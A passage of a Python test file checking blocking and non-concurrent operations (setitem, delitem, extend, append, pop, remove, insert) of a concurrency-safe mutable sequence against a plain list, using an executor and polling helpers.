0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_set.__name__), 'params_1': ((0, "A"), {}), 'el_2': ft.c_identity, 'params_2': ((None,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) csmseq[0:] = fix_init_csmseqdata # test_blocking - __iter__ execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__iter__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - __reversed__ execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__reversed__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((reversed(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - contains execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__contains__.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((True,), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.__len__.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - c_len execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_len.__name__), 'params_1': ((), {}), 'el_2': ft.c_identity, 'params_2': ((len(fix_init_csmseqdata),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - count execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.count.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.count(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) # test_blocking - index execs.Ca.c_exec_multiple( csl=fix_csl, exec_=fix_exec, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.c_apply.__name__), 'params_1': ((), { 'index': 0, 'func': __apply_delay }), 'el_2': ft.c_identity, 'params_2': ((APPLY_RETURN,), None) }), 'max_check_count': 1 }), join=False ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmseq, csmseq.c_apply.__name__), 'params': ((), { 'index': 0, 'func': __apply_no_delay, 'blocking': False }), 'expected_exception': TimeoutError }) }), join=True ), execs.Im.ExecDelayedParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmseq, csmseq.index.__name__), 'params_1': ((fix_init_csmseqdata[0],), {}), 'el_2': ft.c_identity, 'params_2': ((fix_init_csmseqdata.index(fix_init_csmseqdata[0]),), None) }), 'max_check_count': 1 }), join=True, min_sec=APPLY_TIMEOUT_SHORT - 2.0, max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) ], manager=fix_manager, _min_sec=APPLY_TIMEOUT_SHORT, _max_sec=APPLY_TIMEOUT_SHORT + 1.0 ) fix_exec.c_join() # noinspection PyArgumentList def test_csmlseqdata_non_concurrent( fix_csl: cs.En.CSL, fix_init_csmseqdata: con.Pr.Iterable[Any], fix_manager: Optional[mp_mngr.SyncManager], fix_csmlseq_factory: Callable[[cs.En.CSL, con.Pr.Iterable[TYPE], Optional[mp_mngr.SyncManager]], csdata.Pr.CSMutableLengthSequence[TYPE]], fix_exec: execs.Im.Exec) -> None: fix_init_csmseqdata = tuple(fix_init_csmseqdata) init_len: Final[int] = len(fix_init_csmseqdata) assert init_len > 2 csmlseq: csdata.Pr.CSMutableLengthSequence[Any] = cast(csdata.Pr.CSMutableLengthSequence[Any], fix_csmlseq_factory(fix_csl, fix_init_csmseqdata, fix_manager)) csmlseq_twin: List[Any] = list(fix_init_csmseqdata) # setitem - diff len for setitem_name in (csmlseq.__setitem__.__name__, csmlseq.c_set.__name__): # incr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(1, 2), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(1, 2), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem append fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(init_len, init_len + 10), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply( el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(init_len, init_len + 10), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem append 2 fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(init_len + 5, init_len + 10), (1, "asdf", 242.54)), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply( el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(init_len + 5, init_len + 10), (1, "asdf", 242.54)), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # setitem decr len fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), setitem_name), 'apply_params': ((slice(0, 3), (1, "asdf")), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__setitem__.__name__), apply_params=( (slice(0, 3), (1, "asdf")), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # delitem for delitem_name in (csmlseq.__delitem__.__name__, csmlseq.c_delete.__name__): # int index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((2,), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (2,), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # int IndexError fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((-(init_len + 1),), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((-(init_len + 1000),), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((init_len,), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_raises, 'params': ((), { 'raiser': (csmlseq, delitem_name), 'params': ((init_len + 1000,), {}), 'expected_exception': IndexError }), 'max_check_count': 1 }), join=True ) ], manager=fix_manager ) # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(1, 3),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(1, 3),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(init_len - 2, init_len + 100),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(init_len - 2, init_len + 100),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 2 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # slice index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), delitem_name), 'apply_params': ((slice(init_len, init_len + 100),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.__delitem__.__name__), apply_params=( (slice(init_len, init_len + 100),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) # iadd, extend, c_extend for extend_name in (csmlseq.__iadd__.__name__, csmlseq.extend.__name__, csmlseq.c_extend.__name__): fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), extend_name), 'apply_params': (((2, "asb", 3.5),), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.extend.__name__), apply_params=( ((2, "asb", 3.5),), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 3 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # append, c_append for append_name in (csmlseq.append.__name__, csmlseq.c_append.__name__): fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), append_name), 'apply_params': (("asb",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.append.__name__), apply_params=( ("asb",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) + 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # clear fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.clear.__name__), 'apply_params': None }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.clear.__name__), apply_params=None) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': 0 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.pop.__name__), 'apply_params': None }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.pop.__name__), apply_params=None) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop - index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.pop.__name__), 'apply_params': ((2,), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.pop.__name__), apply_params=( (2,), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # pop - index fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.pop.__name__), 'params_1': ((2,), {}), 'el_2': (csmlseq_twin, csmlseq_twin.pop.__name__), 'params_2': ((2,), {}) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # remove fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.remove.__name__), 'apply_params': ((csmlseq[1],), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.remove.__name__), apply_params=( (csmlseq_twin[1],), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_eq, 'params': ((), { 'el_1': (csmlseq, csmlseq.c_len.__name__), 'params_1': None, 'el_2': ft.c_identity, 'params_2': ((), { 'el': len(fix_init_csmseqdata) - 1 # 'remove' removes first occurrence }) }), 'max_check_count': 1 }), join=True) ], manager=fix_manager ) csmlseq[0:] = fix_init_csmseqdata csmlseq_twin[0:] = fix_init_csmseqdata # insert fix_exec.c_exec_multiple( csl=fix_csl, join=False, exec_params=[ execs.Im.ExecParams( func_or_obj_func=ft.c_poll_condition, params=((), { 'condition_check': ft.c_elem_wise_eq, 'params': ((), { 'el_1': ft.c_get_and_apply, 'params_1': ((), { 'el': ft.c_identity, 'params': ((), { 'el': csmlseq }), 'apply_func': (type(csmlseq), csmlseq.insert.__name__), 'apply_params': ((1, "sadfasfd",), {}) }), 'el_2': ft.c_identity, 'params_2': ((), { 'el': ft.c_get_and_apply(el=ft.c_identity, params=((csmlseq_twin,), {}), apply_func=(type(csmlseq_twin), csmlseq_twin.insert.__name__), apply_params=( (1, "sadfasfd",), {})) }) }), 'max_check_count': 1 }), join=True ), execs.Im.ExecParams(func_or_obj_func=ft.c_poll_condition, params=((), { 